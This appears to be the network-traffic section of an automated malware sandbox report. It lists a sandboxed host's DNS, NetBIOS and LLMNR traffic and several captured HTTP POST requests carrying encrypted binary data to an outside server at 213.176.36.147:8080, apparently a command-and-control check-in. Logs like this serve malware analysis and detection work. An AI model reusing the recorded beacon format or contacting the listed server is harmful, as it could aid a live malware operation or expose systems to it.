Hosts
No hosts contacted.
TCP
| Source |
Source Port |
Destination |
Destination Port |
| 192.168.56.101 |
49184 |
213.176.36.147 |
8080 |
UDP
| Source |
Source Port |
Destination |
Destination Port |
| 192.168.56.101 |
51808 |
114.114.114.114 |
53 |
| 192.168.56.101 |
51963 |
114.114.114.114 |
53 |
| 192.168.56.101 |
53210 |
114.114.114.114 |
53 |
| 192.168.56.101 |
55368 |
114.114.114.114 |
53 |
| 192.168.56.101 |
60123 |
114.114.114.114 |
53 |
| 192.168.56.101 |
60384 |
114.114.114.114 |
53 |
| 192.168.56.101 |
137 |
192.168.56.255 |
137 |
| 192.168.56.101 |
138 |
192.168.56.255 |
138 |
| 192.168.56.101 |
123 |
20.189.79.72 time.windows.com |
123 |
| 192.168.56.101 |
49713 |
224.0.0.252 |
5355 |
| 192.168.56.101 |
51378 |
224.0.0.252 |
5355 |
| 192.168.56.101 |
53237 |
224.0.0.252 |
5355 |
| 192.168.56.101 |
53380 |
224.0.0.252 |
5355 |
| 192.168.56.101 |
56804 |
224.0.0.252 |
5355 |
| 192.168.56.101 |
58367 |
224.0.0.252 |
5355 |
| 192.168.56.101 |
61680 |
224.0.0.252 |
5355 |
| 192.168.56.101 |
62191 |
224.0.0.252 |
5355 |
| 192.168.56.101 |
62318 |
224.0.0.252 |
5355 |
| 192.168.56.101 |
63429 |
224.0.0.252 |
5355 |
| 192.168.56.101 |
65004 |
224.0.0.252 |
5355 |
HTTP & HTTPS Requests
| URI |
Data |
| http://213.176.36.147:8080/ir1ZY/2iL1Pr/hFYQeQTZOdzKsYPNH/BTXlpkVQdFpw/TnypTnGyIcEf2/td9DIJt1T/ |
POST /ir1ZY/2iL1Pr/hFYQeQTZOdzKsYPNH/BTXlpkVQdFpw/TnypTnGyIcEf2/td9DIJt1T/ HTTP/1.1
Referer: http://213.176.36.147/ir1ZY/2iL1Pr/hFYQeQTZOdzKsYPNH/BTXlpkVQdFpw/TnypTnGyIcEf2/td9DIJt1T/
Content-Type: multipart/form-data; boundary=---------------------------544661808859543
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 213.176.36.147:8080
Content-Length: 4548
Connection: Keep-Alive
Cache-Control: no-cache
-----------------------------544661808859543
Content-Disposition: form-data; name="lwWTjyNlmoNoGd"; filename="sDwXwgJgpZcT"
Content-Type: application/octet-stream
\xc1\x13u\xd2\x0b\xff\x06\xa5\xc1\xcf+=P\x9e\xa5\x14\xc6\xff\xd0i\xe9\x96\x0c~\xfb`\xf5\x8d*\xa0\xb73J\x1d\xd6$\xfd\x85&#\x83\xe3A\xb4<\xbd]\x17\x95\x04\xf0|,\xc4\x8cv1\x92\xfe@m \x1c\x00QO\xcb\xe3\xff\x1a\xae\x0f\xbc\xeb\xb2i\xbf\x88YSk\x95v.\xc34\xbe\xc2\xb5=\xc6$w\x03KFO\x1e\xc3\xcd\xd6\x1c\xdbU\xdeL\xda\xdcl\xf3@\x82\x85d\xb9\x98W\x03\x9ad4\xf9\xbbo'\xd5\x9e\xb6\xc5\xdf\xd8k\xea\xef\xceP\xf5\xf0\x94X\xbf\xf1iY\x8a\xf7B\x00\xea\xd9VH20`\x14w\xd1\x7fy\x89\x19\x7f{\xe4\xc8\xfdh\xe7\xfe\x97\xa5\x06\xca\x1c1\xc7!\xc8A3z\xd4u)
z\xd3\x9d)\xe3d]3VS\x82\xfb\xfe\xd0\xb3i\xe4\x97\xfa\x12\xe7\xc9\x0f\xfe\xeb\xd4\xc1"\xe0\x08\xb5so\x1eE[\xd1\x00\x15\xc7\x00M\xefX"\x82\x93\xa0\x87]\xc8\x98m\xac\xe8z>\x80\x97\x98
x\x7fI\x92ud\x0e,\xd0\xc6\xe4\x84
\x1aQ\\x80]j\xeb*\xb5n\x9b\x11\xdby`U\x87K^mS\x92
1\x1e\x02=\x8e\x16\x90\xcb\xf7\x98n\xb4m\x1e\xab\x1d
\x1bC\x1a\xad\x19\x07$\xc5\x11b\xaaC
S\x90\x87BY\xc6\x1c\xcb0'e\xa2P\x13\x06$i}\xe4\x81\x12\xe5\xbe\x97\xde\x1dE5\xdc\xeeP\xee\x01XRF\xf0\xca\x0f\xd4r\x9d\x92\xcc\xc4\xfd\xfa\xad\xbd
&\x10\x8c^\xa1\xf0\xd5\xc2\x97O\xdc\xfb5U\xef\xfd.\x03/1\xea\x0c\\xc7fBH\x17\x1d\xc0\x84\xf9\xa9\x83WS\x1c\xdf\xbf/\xf5\x8c\x84W\xfb\x8b/\x1e36\xad\xfb\\xf7G\xec\x07\xca\xf9\xfb\xafBO5\x18Ozb\xd1\xf7\xec\x86!\xf2)k\xb5C\xc0\x8d+,\x05\x05\xa9t\xa4{\xf4
-----------------------------544661808859543--\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
| http://213.176.36.147:8080/ir1ZY/2iL1Pr/hFYQeQTZOdzKsYPNH/BTXlpkVQdFpw/TnypTnGyIcEf2/td9DIJt1T/ |
POST /ir1ZY/2iL1Pr/hFYQeQTZOdzKsYPNH/BTXlpkVQdFpw/TnypTnGyIcEf2/td9DIJt1T/ HTTP/1.1
Referer: http://213.176.36.147/ir1ZY/2iL1Pr/hFYQeQTZOdzKsYPNH/BTXlpkVQdFpw/TnypTnGyIcEf2/td9DIJt1T/
Content-Type: multipart/form-data; boundary=---------------------------544661808859543
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 213.176.36.147:8080
Content-Length: 4548
Connection: Keep-Alive
Cache-Control: no-cache
|
| http://213.176.36.147:8080/ir1ZY/2iL1Pr/hFYQeQTZOdzKsYPNH/BTXlpkVQdFpw/TnypTnGyIcEf2/td9DIJt1T/ |
POST /ir1ZY/2iL1Pr/hFYQeQTZOdzKsYPNH/BTXlpkVQdFpw/TnypTnGyIcEf2/td9DIJt1T/ HTTP/1.1
Referer: http://213.176.36.147/ir1ZY/2iL1Pr/hFYQeQTZOdzKsYPNH/BTXlpkVQdFpw/TnypTnGyIcEf2/td9DIJt1T/
Content-Type: multipart/form-data; boundary=---------------------------544661808859543
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 213.176.36.147:8080
Content-Length: 4548
Connection: Keep-Aliv |
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts